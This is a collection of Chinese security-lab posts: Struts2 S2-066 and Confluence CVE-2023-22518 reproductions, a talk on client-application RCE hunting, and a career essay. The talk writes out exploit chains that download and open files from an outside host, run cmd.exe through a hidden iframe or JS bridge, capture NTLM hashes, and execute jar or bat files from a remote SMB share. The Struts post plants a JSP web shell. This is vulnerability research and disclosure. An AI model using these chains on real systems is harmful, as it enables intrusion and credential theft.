pom.xml 中添加 Struts2 依赖，以 6.3.0 版本为例，tomcat 也添加上，以便获取当前路径；

<dependency>  <groupId>org.apache.strutsgroupId>  <artifactId>struts2-coreartifactId>  <version>6.3.0version>dependency><dependency>  <groupId>org.apache.tomcatgroupId>  <artifactId>tomcat-catalinaartifactId>  <version>8.5.81version>dependency>

web.xml 中配置过滤器：

 "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN" "http://java.sun.com/dtd/web-app_2_3.dtd" ><web-app>  <display-name>Archetype Created Web Applicationdisplay-name>  <filter>    <filter-name>struts2filter-name>    <filter-class>org.apache.struts2.dispatcher.filter.StrutsPrepareAndExecuteFilterfilter-class>  filter>  <filter-mapping>    <filter-name>struts2filter-name>    <url-pattern>*.actionurl-pattern>  filter-mapping>web-app>

文件上传的 action：

package blckder02.struts2.action;import com.opensymphony.xwork2.ActionSupport;import org.apache.commons.io.FileUtils;import java.io.File;import java.io.IOException;publicclass UploadAction extends ActionSupport {    private File myfile;    private String myfileContentType;    private String myfileFileName;    private String destpath;    public String execute() {        destpath = ServletActionContext.getServletContext().getRealPath("/")+"uploads\\upload\\";        try{            System.out.println("Src File name: " + myfile);            System.out.println("Dst File name: " + myfileFileName);            File destFile = new File(destpath, myfileFileName);            FileUtils.copyFile(myfile, destFile);            return SUCCESS;        } catch (IOException | NullPointerException e) {            e.printStackTrace();            return ERROR;        }    }    public File getMyfile() {        return myfile;    }    public void setMyfile(File myfile) {        this.myfile = myfile;    }    public String getMyfileContentType() {        return myfileContentType;    }    public void setMyfileContentType(String myfileContentType) {        this.myfileContentType = myfileContentType;    }    public String getMyfileFileName() {        return myfileFileName;    }    public void setMyfileFileName(String myfileFileName) {        this.myfileFileName = myfileFileName;    }}

uopload.jsp：

<%@ page contentType="text/html;charset=UTF-8" language="java" %><%@ taglib prefix="s" uri="/struts-tags"%><html><head>    <title>Uploadtitle>head><body><h2>Uploadh2><br/><form action="upload.action" method="post" enctype="multipart/form-data">    <s:label for="myfile">Please upload your files:label><br/>    <input type="file" name="myfile"/>    <input type="submit" value="Upload"/>form>body>html>

success.jsp：

<%@ page contentType="text/html;charset=UTF-8" language="java" %><%@ taglib prefix="s" uri="/struts-tags"%><html><head>    <title>Successtitle>head><body>You have successfully uploaded <s:property value="myfileFileName"/>body>html>

struts.xml 中配置 action 的解析，继承了 struts-default 包；

        "-//Apache Software Foundation//DTD Struts Configuration 2.0//EN"        "http://struts.apache.org/dtds/struts-2.0.dtd"><struts>    <package name="default" namespace="/" extends="struts-default">        <action name="upload" class="blckder02.struts2.action.UploadAction" method="execute">            <result name="success">/success.jspresult>            <result name="error">/upload.jspresult>        action>    package>struts>

struts-default 包中使用了FileUploadInterceptor和ParametersInterceptor，在这里也是继承使用的，会对上传的文件以及参数进行拦截校验；

最后配置上 Tomcat 就可以运行了。

3. 漏洞复现

准备一个含有简单 jsp 木马的文件；

选择文件，上传抓包；

发送到 Repeater，修改请求包，将myfile参数名的第一个字母改为大写，再构造一个myfileFileName参数，参数值为想要文件保存后所在的路径及文件名。构造的参数名必须是第一个参数名+"FileName"，不能随便构造。
上传成功后可以看到文件名为自定义的参数值；

访问 jsp，能成功执行命令，文件保存到了 /uploads 目录下，且文件名保存为构造传入的exec.jsp。

4. 漏洞分析

断点跟踪一下文件上传的流程，可以从org.apache.struts2.dispatcher.Dispatcher#serviceAction()断点，开始处理文件上传的 action；
可以看到 request 中含有一个文件类型参数files和一个字符串类型的参数params；

跟进，将myfileFileName参数封装成了 HttpParameters 对象，添加到了context中；

回到serviceAction()中，extraContext是前面createContextMap()创建的 context 对象，这里生成了一个 action 的代理对象，开始执行 action 流程。

接着进入 FileUploadInterceptor，从上传的请求中提取了文件、Content-Type 和文件名；可以看到保存文件名的键名是inputName + "FileName"，所以请求包中构造的参数名也得是这种形式，才能完成覆盖。

在调用multiWrapper.getFileNames()的时候，对文件名中/、\符号前的字符串进行了过滤，所以直接在文件名中进行路径穿越是不行的；

把这三个值添加到 HttpParameters 对象中后，actioncontext 里的参数就有四个了。

进入 ParametersInterceptor，在setParameters()中，将 HttpParameters 对象中的参数依次放入 TreeMap 对象中；

可以看到 TreeMap 对象中保存的参数顺序变了，是因为 TreeMap 对象会按参数名的大小顺序从小到大保存值；
在TreeMap.put()方法中，会将新添入的参数名与已保存的参数名做比较；

比较逻辑就是逐字符比较，遇到不相同的字符就返回新增参数名与已保存参数名 ASCII 的差值；

差值为负，则说明新增参数名比已保存参数名的 ASCII 值小，将新增参数插入到已保存参数的前面，所以要保证构造的文件名比inputName + "FileName"生成的文件名的 ASCII 值大。

newStack.setParameter()进行参数绑定，遍历后myfileFileName的值已经被赋为S2-66.txt；

跟进，调用task.execute()执行表达式；

一直跟进，会再次调用 setter 方法为myfileFileName赋值，所以第一次赋值的S2-66.txt就被覆盖为../exec.jsp了。

最后在 UploadAction 中保存文件，路径中拼接的文件名包含路径穿越符，便会解析保存到上一目录。

5. 补丁分析

在 6.3.0.2版本中，HttpParameters 类的appendAll()中添加调用了remove()方法；遍历检查参数是否需要删除，remove()方法中添加使用了equalsIgnoreCase()方法来忽略大小写进行比较。

断点进入，将MyfileFileName与myfileFileName带入校验；

跟进，在StringLatin1.regionMatchesCI()中，将两个参数名进行了统一的大小写转换再进行比较，这里的比较结果相同，返回 true；

于是将已经存在的同名参数（忽略大小写）删除了，后面就不存在二次调用 setter 方法来覆盖了。

参考链接：
https://y4tacker.github.io/2023/12/09/year/2023/12/Apache-Struts2-文件上传分析-S2-066/
https://xz.aliyun.com/t/13172

阅读原文

跳转微信打开

被忽视的暗面：客户端应用漏洞挖掘之旅

Mon, 18 Dec 2023 15:00:00 +0800

原创 key 2023-12-18 15:00 江苏

客户端应用漏洞是许多人在进行漏洞挖掘和安全测试时容易忽视的领域。随着技术的更迭和攻防手段的升级，客户端应用漏洞也逐渐出现在大众视野中（APT攻击、攻防赛事等等），在本次议题中，我们将重点关注PC侧的客户端应用程序。

被忽视的暗面：客户端应用漏洞挖掘之旅

key@中孚信息元亨实验室

前言

在2023年12月15日，我有幸参加了由“字节跳动安全中心”举办的“安全范儿”沙龙活动。作为“中孚信息元亨实验室”的一员，我被邀请分享名为“被忽视的暗面：客户端应用漏洞挖掘之旅”的技术议题。

客户端应用漏洞是许多人在进行漏洞挖掘和安全测试时容易忽视的领域。随着技术的更迭和攻防手段的升级，客户端应用漏洞也逐渐出现在大众视野中（APT攻击、攻防赛事等等），在本次议题中，我们将重点关注PC侧的客户端应用程序，如即时通讯、远程服务、视频软件等应用，探索其中存在的漏洞和潜在的安全风险。

漏洞案例

漏洞案例的分析主要分为两类，一是常规风险的介绍和了解，二是RCE漏洞的挖掘思路和手法。

注意：以下漏洞案例均通过脱敏和细节上的处理。

常规风险篇

常规风险在这里我分为这几类：信息泄露、白利用、逻辑校验、缓冲区溢出。

信息泄漏

对于客户端的信息泄露，我一开始采用的方式就是基于IDA Strings进行敏感的字符串信息匹配，将HaE的规则转为Yara规则再通过FindCrypt3插件进行匹配。

实际效果没有那么好，仅有一些数据库的连接配置信息泄露，并且由于是基于IDA的也没有那么好的进行自动批量化发现。

我们可以借助Strings工具来快速的获取可执行文件的字符串内容，并通过正则或其他方式进行匹配。

白利用

白利用问题就老生常谈了，在红队的工作中也经常遇到，如DLL文件没有经过比对导致的劫持问题、带有签名的程序可以通过参数的方式执行任意命令。因此在这里就不过多赘述了。

逻辑校验

很多客户端程序在对用户信息进行获取的时候会通过内存的方式，来获取用户的编号，从而基于此进一步来获取用户的信息。然而这种方式并不是完全可信的，我们可以通过CE来对内存进行修改，从而导致越权漏洞的产生。

这类问题很经典，在以往就有许多案例（wooyun-2015-0143395、wooyun-2014-048606），但现在仍然可以从一些主流的应用上发现到类似的安全问题。

缓冲区溢出

缓冲区溢出问题太多太多了，我们可以通过通过IDA插件VulFi定位脆弱点，很轻松的在一些客户端应用上找到堆、栈溢出问题。除此之外，也可以通过Boofuzz来对客户端应用开启的本地网络服务进行Fuzz，从而找到溢出问题。

除了本地网络服务以外，最经典的、利用最多的还是特定文件格式处理客户端，如常用的Word、Excel。我在实际挖掘的过程中找到了一些图片处理的客户端程序，它用于各种各样的图片处理，我们可以找一些比较不常见的图片格式，并且通过网盘资源找到一些样本文件，丢给GPT或IFFA来分析文件格式，并输出Pits脚本，通过Peach Fuzzer来进行Fuzz工作。

RCE篇

接着我们来到RCE篇，请注意这里的RCE并不是Pre Auth的，案例中提到的大多需要1 Click进行交互才能利用。但也不是绝对，如果一些客户端的网络服务端口是监听在0.0.0.0的，只要你与目标机器处于同一个网络，或该客户端是在服务器上使用的，也一样可以实现0 Click的效果。

Web类客户端

Web类客户端，我的定义是基于HTML、CSS、JS等Web前端技术所构建的客户端应用程序，如Electron这类CEF（浏览器嵌入式）框架开发的客户端应用，以及基于渲染引擎（如Wke）所开发的客户端应用。

某IM客户端应用

如下图所示，是一个即时通讯客户端应用，我在群名称重命名时发现了一个反射XSS漏洞，根据其目录结构我知道它是一个基于Electron开发的程序。

在Electron框架下，如果开发者在渲染页面时配置nodeIntegration为true，则说明我们可以在前端中使用Nodejs的语法，这就导致我们可以直接在前端使用如下Nodejs代码执行命令：

require('child_process').exec(...);

但是这个配置项在创建功能窗口时并没有开启：

所以，我们也就没办法通过XSS执行Nodejs的代码，但是根据当前的Electron的版本1.8.7去互联网检索，发现这个版本存在一个历史漏洞：CVE-2018-15685，而后进行相关验证，也无法成功。

但是我们在\resources\app\src\inject\preload.js文件中（这是预加载JS，也就表示这个文件在窗口创建后，页面创建前就执行了），发现了注册的全局变量：

window.ZxDesktop = ZxDesktop;

所以我们可以直接去调用这个全局变量，从而去使用其内部的定义的一些功能：

该全局变量实际上导出了很多其他模块及对应方法：

我们跟进File模块，就可以发现存在一个open函数：

跟进代码和测试之后，发现它就是文件打开函数，在Console下去调用，成功打开计算器：

接着看导出函数列表的其他项，发现存在两个文件保存的方法：

而它们所指向的都是另外一个模块的方法：

const Download = require('../download_extra/download.render.js');

跟进这个模块，发现实际上他们都来自同一个方法，只不过传递的参数isSelect有不同：

接着我们来完整的阅读下代码即可发现整个逻辑，首先根据你传递的参数来判断要调用NormalDownload（正常下载）还是ChunkDownload（分块下载），接着根据isSelect函数来判断调用save还是saveAs方法：

所以我们仍然需要跟进NormalDownload或ChunkDownload对应的代码，来查看它们这些方法的逻辑是什么，这里看了之后，两者代码的唯一区别就是分块，所以本文就以NormalDownload的save、saveAs方法去说明。

首先是saveAs方法，它会调用一个文件保存框，然后赋值调用retryStart方法：

而实际上retryStart方法内调用的是start方法，这个方法是用来进行请求下载的：

而后下载的文件实际上会保存在用户的数据目录下，save方法与saveAs方法的最大的不同就是没有这个文件保存框，所以我们当然选择使用save方法。

需要注意，在如上代码中save和saveAs的传递参数不一致，其实这不影响最终的处理，因为在一开始的对象创建时候就通过构造函数赋值了：

let downloader = new Download(file, config);

至此，我们就获得了文件下载的攻击路径，我们可以根据对应参数这样构建JS代码：

ZxDesktop.require("File").save({"url": "http://gh0st.cn:81/test.txt","name": "test.txt","path": "","chunkSize": "","size": "","fileData": ""});

我们已经获得了文件下载的功能，攻击路径就很明显了：用户下载文件，打开文件。但是实际操作中，我们打开文件还缺少一个路径，并且在实际的测试中，默认情况下，下载的文件是会保存在应用的数据目录的null目录下：

而这个目录可能会被用户更改（用户名也没法获取），所以我们需要搭配一个点去获取路径，在这里找到了ZxDesktop的System模块：

它的导出列表中有两个属性：dbPath、userDataPath，它们的内容都是一样的，指向了用户的数据目录：

ZxDesktop.require("System").userDataPath

我们可以这样拼接，就有了下载文件的目录信息了：

ZxDesktop.require("System").userDataPath + "/null/test.txt"

当我们满足所有条件后，就可以构造完整的攻击代码了：
1.下载文件：

var a = ZxDesktop;
var b = a.require("File");
b.save({"url": "http://gh0st.cn:81/test.txt","name": "test.txt","path": "","chunkSize": "","size": "","fileData": ""});

2.拼接文件路径，打开文件：

b.open(a.require("System").userDataPath + "/null/test.txt");

3.最终Exploit：

">

某运维平台客户端

在某运维平台客户端中，我们发现可以通过伪协议链接（xxx://webview/?url=http://xxxx）来达到端内任意页面加载，这也就表示我们可以执行任意JS代码。

根据加载的DLL文件得知，其所依赖的前端页面渲染是开源项目Wke。

在源代码wke/jsBind.cpp中，发现wkeJSBindFunction方法提供了JSBridge的功能，将JavaScript函数绑定到C++中一个本地函数。

基于IDA分析得知，目标应用使用了该方法将JS函数与C++函数进行了绑定。图下图所示，其将C++某个函数地址，与名为callprogram的JavaScript函数进行绑定，我们可以直接在JS代码中调用。

跟进对应的C++函数，我们发现它会通过wkeJSParam获取参数，再通过JSToTempStringW获取字符串形式的参数值，最终将两个参数带入ShellExecuteW函数执行。即最终执行的代码为：ShellExecuteW(0, "open", 参数1, 参数2, 0, 1)。

因此我们可以构建如下的Exploit代码，并通过伪协议的方式使目标可以打开包含Exp代码的网页：

<script>callprogram("C:/Windows/System32/cmd.exe", "/c calc");script>

传统类客户端

传统类客户端，我的定义是基于C/C++写的一些传统应用，如VPN客户端、视频软件、远程控制软件等偏生活、日常类的应用。

某远程服务平台客户端

在拿到一个客户端程序时，第一步是安装，第二步则应该是先大致去了解该程序的一些目录结构、运行环境等信息，这样我们在接下来的漏洞挖掘中才会有更多的信息来进行关联，辅助我们挖掘漏洞。

如下图所示，安装完某远程服务平台客户端后，我通过火绒剑逐个查看对应的进程信息，在TCP/IP窗口中看见当前进程的网络通信或监听信息。如下图所示就是UserClient.exe进程当前的网络通信信息，我们可以看到它在本地监听了两个端口：38227、38230。

它的协议都是TCP，我们可以尝试使用HTTP的方式去访问，结果显示38230端口可以以HTTP协议的方式进行访问。

我们可以选取响应报文中的bangwo8client字符串在IDA的Strings窗口中进行搜索，通过这样的方式来进行逻辑的回溯。

双击进入字符串所在的.RDATA节，我们就可以看到该字符串对应的交叉引用，那么接下来我们的工作就是进入这些函数看具体实现是否对的上响应报文的主体内容。

我们进入一个函数查看，会发现在函数的头部代码中有如下这么一段内容，它的逻辑似乎就对应了HTTP响应报文的主体返回，通过字符串的对应我们能大致知道sub_487760函数的作用就是为了将字符串解析到JSON格式中，然后再通过其他函数拼接JSON的字段内容给到Block。

除了我们跟进的这个函数外其他的函数逻辑都大致一样，并且我们通过IDA插件CTO查看调用关系，发现这些函数最终都是被同一个函数sub_674090调用。

那我们再继续跟进函数sub_674090，函数的逻辑就是根据不同的URI进入不同的函数处理，也就表示着这里就是HTTP请求逻辑处理的入口位置。

有了请求处理逻辑的入口，接下来我们就要去看每个URI对应的处理逻辑是什么，看一下处理的逻辑中是否有参数值可控导致存在的相关漏洞。

如果你觉得这样去看很累，也可以基于敏感函数的调用链来对应每个URI的处理函数，如下图所示我就基于ShellExecuteA函数的调用链找到了URI/api_install的对应处理函数，也就表示当你访问URL：http://127.0.0.1:38230/api_install时很有可能就会触发ShellExecuteA函数。

那么我们可以跟进去看一下该处理函数，看看是否可以将可控参数值带入到ShellExecuteA函数里去执行。

在函数的一开始就判断运行当前程序的用户是否是system，如果不是的话则直接返回响应内容（状态码500）提示当前不是以SYSTEM权限运行的进程。

这里我们通过Process Hacker可以看到UserClient.exe进程对应的用户就是SYSTEM：

也就表示我们当前是满足这个条件的，所以可以接着看IF分支内的逻辑。在IF分支内就执行了ShellExecuteA函数，根据ShellExecuteA函数的使用语法我们知道它这是以v15作为参数执行v16程序，所以我们需要知道v15、v16这两个变量是如何赋值而来的。

具体的逻辑可以下图，我们找到赋值关系最终确认一切的参数来源都是Block，该值是一个全局变量，那么根据当前的环境我们就可以猜测此处的来源就是HTTP请求参数。

根据猜测，我们可以先使用OD附加进程在ShellExecuteA函数处下断点。

然后请求URL：http://127.0.0.1:38230/api_install?file=cmd.exe¶m=/k%20notepad，我们就会在OD界面中看见端点到ShellExecuteA函数了，我们可以通过栈来看一下传参是什么。

如下所示我们发现ShellExecuteA函数的参数FileName和Parameters是一串乱码的内容，这应该是我们输入的字符串经过了某些处理后导致的。

因此我们可以在URI/api_install对应处理的函数起始位置下断点一步一步跟进看一下我们请求的参数值是否真的带进来了，如果带进来了为什么最终值会变成一段乱码的数据。

如下图OD中可以看见我们的请求参数file的值cmd.exe确实可以带进来，这也就验证了我们的猜想，ShellExecuteA函数的参数是来源于HTTP请求参数。

接着走下去我们会发现调用如下函数时的参数就是我们的请求参数file和对应值cmd.exe，当该函数执行完成之后返回到EAX寄存器，我们跟进EAX寄存器的地址查看数据就会发现数据为乱码内容，也就是我们在ShellExecuteA函数断点处看见的参数。

push esipush eaxcall UserClie.004203B0

所以我们可以跟进函数004203B0在IDA中看一下它具体做了什么，这样我们才能构造请求让真正的字符串带入到ShellExecuteA函数中执行。

在这之前我们需要注意，由于IDA和实际进程执行的基址不同，我们可以在OD中找到进程基址然后将IDA对应的基址修改为进程的，这样我们就可以直接跟进函数004203B0，而不需要再去进行地址的换算。

在IDA中跟进函数004203B0，它实际上也是调用的另外一个函数00370C70，在该函数里对字符串进行位移转换，猜测可能是自定义的解码方式。但是在它进行遍历的过程中使用到了一段数组数据word_74E940，我们跟进这个数据之后发现似乎是一张解码表。

如下将整段数据罗列出来，看着与Base64解码所需要的解码表是一致的，所以此处极有可能就是Base64解码操作，将我们的输入的字符串cmd.exe进行解码，最终就变成了乱码。

我们可以将cmd.exe字符串进行Base64解码，发现结果确实为我们之前所看到的乱码内容：

最终我们也就确定了这里的请求参数值是需要先进行Base64编码之后再带入请求的。因此我们可以构建出如下Exploit，当安装了该客户端的应用打开Exp代码对应页面时，即可以执行我们想要的命令。

<iframe src="http://127.0.0.1:38230/api_install?file=Y21kLmV4ZQ==¶m=L2sgbm90ZXBhZA==" width="0px" height="0px">

某视频软件客户端

通过URLProtocolView找到视频软件客户端注册的伪协议：xxplayer://，通过字符串定位程序伪协议的处理功能点，也可以知道有哪些的伪协议路由。

发现这里可以通过xxplayer://action.cmd/xxx的方式来触发一些功能，所有功能列表如下所示：

xxplayer://action.cmd/playShareVideoxxplayer://action.cmd/playxxplayer://action.cmd/downloadvideoxxplayer://action.cmd/downloadpagexxplayer://action.cmd/downloadShareVideoxxplayer://action.cmd/createshortcut_urlxxplayer://action.cmd/createshortcutxxplayer://action.cmd/activeHomepage

根据字面意思理解它的作用即可，这里我们一个一个带入请求尝试，发现当请求createshortcut_url时会在桌面创建.link的快捷方式文件。

我们跟进这个创建快捷方式的逻辑，发现实际上它还有两个参数：url、name：

然后将这两个参数值带入CreateUrlShortcut函数执行，这个函数是导入函数，就是用于创建桌面快捷方式的。

因此我们可以构建伪协议URL：xxplayer://action.cmd/createshortcut_url?url=http://www.baidu.com&name=Test，访问就发现它创建了一个名为Test的快捷方式，目标为：C:\xxplayer.exe \UrlQuickLunch=http://www.baidu.com,0，也就表示我们传入的url参数值变成了启动参数，name参数值变成了快捷方式名字。

当我们双击这个快捷方式时，就会调用浏览器打开http://www.baidu.com。

接着我们发现只要url参数值为xxx://xxx.xxx/的格式即可，那么我们尝试将url参数值修改为file://172.16.176.176/netntlm，也就变成这样：xxplayer://action.cmd/createshortcut_url?url=file://172.16.176.176/netntlm&name=123，在机器上responder监听一下，当打开快捷方式时收到了NTLM Hash：

除了获取NTLM Hash，我们还可以在Ubuntu上开一个SMB服务，然后将url参数设为使用\\172.16.176.176\share\Test.exe，使用快捷方式打开共享文件，发现确实可以打开EXE文件，但是会有文件信任的安全警告（Mark-of-the-Web）。

这里可以通过jar文件形式去绕过，打包一个打开计算器的Jar包放在共享目录下，然后将url参数设为使用\\172.16.176.176\share\1.jar。

访问xxplayer://action.cmd/createshortcut_url?url=\\172.16.176.225\share\1.jar&name=123，创建快捷方式，打开快捷方式，执行Jar包启动计算器，这样我们就实现了1 Click执行任意命令。

使用远程Jar包的方式来达到任意命令执行还是有局限性，如果目标机器不存在Java环境就无法执行，因此在对文件信任机制的研究发现在smb共享文件中打开zip压缩包内的bat文件，不会有任何弹窗提示直接执行bat文件内容。

因此我们可以在共享文件夹中创建1.zip，放入内容为calc的1.bat文件。

将url参数值设为\\172.16.176.225\share\1.zip\1.bat，然后访问xxplayer://action.cmd/createshortcut_url?url=\\172.16.176.225\share\1.zip\1.bat&name=123创建桌面快捷方式，打开快捷方式即可执行bat文件，最终达到不需要任何依赖的情况下执行任意命令。

总结

简单总结一下以上两类客户端的攻击入口、RCE风险和影响面。

关于客户端本地开启的网络协议问题，我总结出如下几步可以快速的进行漏洞发现:

找到客户端启动的本地网络服务（TCP、UDP），这个可以用火绒剑或者CMD的方式查看；
有本地监听的情况下，找到对应的程序以及加载的DLL，通过IDA根据端口号找到监听的点，如果是C/C++的程序一般找bind这个函数就能快速定位到；
向上回溯找调用链，并根据网络服务的返回结果，例如HTTP访问会有一段字符串或者响应头的一些字符串，定位到代码处理逻辑；
如果逻辑对应上了，那就接着找程序的导入表是否存在敏感的函数，例如：CreateProcess、WinExec、ShellExec，如果存在则可以向上回溯看看是否与网络服务监听点有联系；
当条件都满足的时候就想尽办法，通过断点调试等操作，找传参或数据传输格式，看看可控内容是否可达敏感的函数处；
根据代码逻辑构造PoC触发漏洞，并尝试武器化利用。

致谢

在文章的最后，我要感谢公司部门领导和同事对本议题的贡献和帮助（以下排名不分先后），感谢字节跳动安全中心对于本次沙龙的筹办和策划。

阅读原文

跳转微信打开

从安全研究员到网络安全教练：这次我想当教练

Wed, 13 Dec 2023 22:49:00 +0800

原创毁三观大人 2023-12-13 22:49 北京

从安全研究员到网络安全教练：这次我想当教练

在完成《我还是想当安全研究员》之后，我观看了一些游戏战队的纪录片，这激发了我开始深思自己的职业道路。后来，21年来到中孚信息，创立了元亨实验室，带了研究型的团队，开始考虑是否将职业重心从安全研究员变成一名网络安全教练。在21年、22年几次都想写一篇《这次我想当教练》的文章，但是自身觉得身边的案例、素材不够，也没有开始动笔。

我这个人，闲不住。在一个方向做深了，老想换一个方向看看。web安全做了几年，觉得反作弊有意思，反作弊做了几年又抓了不少人，想闭环整个链条，又去武汉跟人创业取证。后来看了几个bh的议题，发现web和pwn结合，还能出神洞，让我燃起浓厚的兴趣。19年断断续续，20、21、22年又恶补了一下pwn方向的知识。这东西确实费脑子，到现在我还是感觉要学习的东西太多了。

2021年7月，我加入中孚信息，开始组建元亨实验室。现在我也没明白自己咋就从甲方不干了，重新回乙方遭罪。当初跟公司聊的时候，定的目标要做研究型实验室，这可能激发了我的好胜欲。不瞒大家说，当初看vulcan的人在pwn2own举杯的时候我是真羡慕，orange在bh演讲的web2pwn漏洞，也让我跃跃欲试。所以最初给实验室定的目标就很高，当然公司可能没定这么高的目标，但是我心里是这么想的。

一、组队，就要谈条件

对于一家传统的安全公司，“天才少年”可能不符合他的认知。最开始的时候就要和人力、业务部门持续的battle。到新公司，如果跟别人抢业务，那必不可少的会发生冲突，不过这事我有经验。开创一个新的业务，就不会有人跟你抢。在这个时期，我梳理了公司的问题，发现威胁情报可以做。其实这可以作为一个空降兵的行动指南，作为一个业务空降兵如何在短时间站稳脚步，可以找找依靠三方又很重要的业务，快速复制三方业务，替换三方可以出成绩。当然，这东西我一个人做不了，拉来了专业做威胁情报的2ero、lemon一起来。

当然，谈条件除了要业务突出，还得让其他部门闭嘴。安全公司就是拼安全能力，这事有点因果颠倒，你技术牛，你能谈条件，但是没条件，又招不到技术牛的，容易陷入死循环。幸好当时有key、l1nk3r来帮助我，通过几次对比，成功让其他部门闭嘴。也为以后谈条件打下了良好的基础。

能谈条件了，人员招聘也灵活了起来。研究的顺利开展，完全就是建立在支持的基础之上的。话语权重了，也可以让有能力的人内部转岗，飞飞就是这个时候来的。最近我又思考了一下，传统的人员招聘基本看不出来一个人的水平，一起共事过可能会好很多。下一步，元亨也会开展各类活动，让更多的人一起共事，这样才能发现更多的人才。

二、统一目标

现在很多小朋友，都不喜欢搞攻防演练攻击队，谈演练色变，大部分跳槽的人跟我说，千万不要让他做攻击队。这个问题其实我内心也是很矛盾的，在各个公司高层看来，养了一堆搞研究的，让你去打攻防怎么就不行了。可笑的是，很多公司的高层完全不明白，我们这个行业是分工种的，你让一个做pwn的人做渗透，那他肯定非常难受。正因为业内这种涸泽而渔式的工作方法，让做攻防的苦不堪言。从我的角度来讲，更倾向研究员做纯研究。从公司，从出钱的人的角度来看，我养你就是为了干活的，我让你干活你不做，那养你干什么啊。这个问题，想了几次，得出一个结论，当年我btc卖早了，要不就能养活大家搞纯研究了。

业务目标和研究目标，需要达成某种意义上的统一。这就需要横向管理和向上管理、向下管理的能力。1. 向上管理：要知道上边的目标和预期是什么，预期伴随着投入，也意味着布局，提前投入，提前收获。2. 横向管理：要提前知道业务方明年的重点规划是啥。比如业务要向某个行业倾斜，那我们的研究是不是也要跟着转转。挖洞吗，目标很多，但是需要聚焦。3. 向下管理：要知道小朋友们的诉求是什么。是涨薪、年终奖，还是个人职业发展的需求。如果让一个想做pwn的人，那他肯定难受，他难受也不会让你好受。

三、后勤，做好支撑工作。

这个就是我要做的事了。做威胁情报需要数据，那我就要做好数据支持。做漏洞挖掘需要安装包，那我就要做好软件的采买。做硬件安全就需要买很多硬件，那我就要跟公司说清楚采购的必要性。做大模型又需要买很多显卡，那我就需要去抢资源。现在元亨这些资源都是足够的，就等着出成绩了。这些都是物质上的后勤支持，可能很多都忽视了精神上的后勤支持。这一点，我做的比较差。

我是一个爱吐槽的人，或者是我一个东北人的缘故，很多事情在我看来，都是段子。万物皆可吐槽，是我的人生信条，但是这也给很多朋友产生了心理压力。很多时候，一个事我吐槽了，可能我觉得没什么，其他人可能就上纲上线了。还有，我也有情绪，有情绪倾向于不沟通，背后议论别人，这一点做的很差。lemon说我这么做容易给小朋友们搞的压力很大。做教练不能这么做，做领导也不能这么说。不过我再给自己辩解一句，有时候我吐槽的东西，第二天就忘了，以后得改改万物皆可吐槽这个问题了。

四、让更多的人参与进来

我们内网wiki里都是实验室各位同仁写的文章，文章也都有署名，如果这个人离职了，我们也不会删这个人的id。本来这个行业人就少，相聚就是缘分。百年以后，只有这些数据曾经证明我们来过。思想永存，精神永存。回到安装包这个问题，大家都知道我手上资源多，很多朋友也找我。

我就在想一个问题，要不要弄一个元亨基金。帮助大家做好研究支撑工作，可能钱也不多，刚刚好，正好够研究的开展。我们一起搞点论文，搞点议题，搞点事情。

还有就是，要不要弄一个元亨杯安全竞赛，正如之前我说的，常规的面试并不能发现一个人的优点，我们需要通过实际的情况去判断一个人适合什么工作。

安全行业的蓬勃发展，有赖于大家勇于试错，这是一个需要反复试错的行业，试错就意味着要犯错，但是犯错又和我们传统的观念不同，我们可能认为犯错就是一件不好的事。这次，元亨会给大家犯错的机会，让更多的人参与进来。

最后，感谢实验室全体员工，不管是离职的、在职的还是回学校的，按照加入的顺序：2ero、飞飞、key、lemon、l1nk3r、blckder02、佳禾、翼鼎、祝、depy、Taaaaarn、Disap、Oo。感谢大家，对我的支持。我们2024年，继续冲。

阅读原文

跳转微信打开

Confluence 数据中心和服务器中的不当授权漏洞（CVE-2023-22518）

Wed, 06 Dec 2023 17:16:00 +0800

原创元亨-blckder02 2023-12-06 17:16 浙江

此不当授权漏洞允许未经身份验证的攻击者重置 Confluence 并创建 Confluence 实例管理员帐户。使用此帐户，攻击者可以执行 Confluence 实例管理员可用的所有管理操作，从而导致机密性、完整性和可用性完全丧失。

1. 前言

官方公告：
https://confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html

漏洞描述 ：
此不当授权漏洞允许未经身份验证的攻击者重置 Confluence 并创建 Confluence 实例管理员帐户。使用此帐户，攻击者可以执行 Confluence 实例管理员可用的所有管理操作，从而导致机密性、完整性和可用性完全丧失。

简单理解就是 CVE-2023-22515 可以新建管理员账号，CVE-2023-22518 可以通过备份文件来覆盖原本的 Confluence 服务，从而使用备份文件中的账号管理服务。

影响版本：
修复版本8.3.4、8.4.4、8.5.3、8.6.1之前的版本均受影响。

2. 环境搭建

官网下载 8.5.2 版本：
https://www.atlassian.com/software/confluence/download-archives

具体安装步骤参考 CVE-2023-22515，之前搭了 8.5.1 环境，直接在上面更新。

再贴两个参考链接：

https://andblog.cn/2655
https://l4yn3.github.io/2019/04/20/Confluence-漏洞分析环境搭建/

3. 漏洞复现

在登录状态下，访问/admin/backup.action，导出备份文件，此时 admin 账号的登录密码为confluence.；

然后修改密码为password，以便跟恢复备份后做对比；

退出登录，用 POST 请求/json/setup-restore.action，则能进入恢复备份文件页面；

选择上面生成的备份文件进行导入，抓包把synchronous改为 true，表示同步执行任务；

上传成功；

返回登录界面，用备份文件中的密码进行登录，能够登录进去，说明备份文件覆盖成功。

synchronous不改为 true 的话，就会返回一个 taskId，这个时候虽然返回完成，但还没有覆盖；

然后再访问/longrunningtaskxml.action?taskId=xxx才能覆盖完成。

4. 漏洞分析

diff 一下 8.5.2 和 8.5.3 版本的 jar 包，新增了两个注解@AdminOnly和@SystemAdminOnly，都是用于校验权限的注解，并且为大部分 action 都添加了@WebSudoRequired注解。

4-1. 权限校验1

在 Confluence 服务中，WebSudo 是一种安全机制，用于验证用户的身份执行敏感操作。他表示用户在执行这些操作时需要通过 Web 界面重新验证身份，也就是进行二次验证，以确保用户具有足够的权限来执行这些敏感任务。

在 WebSudoInterceptor 中，获取了 URI、访问的 action 的类以及方法等，调用了matches()方法，如果 matches 方法返回为 true，则进入 else 分支，进行二次登录验证；

进入到DefaultWebSudoManager.matches()，判断了 URI 是否为/admin/开头，是则继续判断访问的 action 的类、方法、包是否添加了@WebSudoNotRequired注解，只要有一个添加了@WebSudoNotRequired注解，就说明当前访问的资源不需要进行二次校验；

URI 不为/admin/开头，则判断访问的 action 的类、方法、包是否添加了@WebSudoRequired注解，只要有一个添加了@WebSudoRequired注解，就说明访问的资源需要进行二次校验；

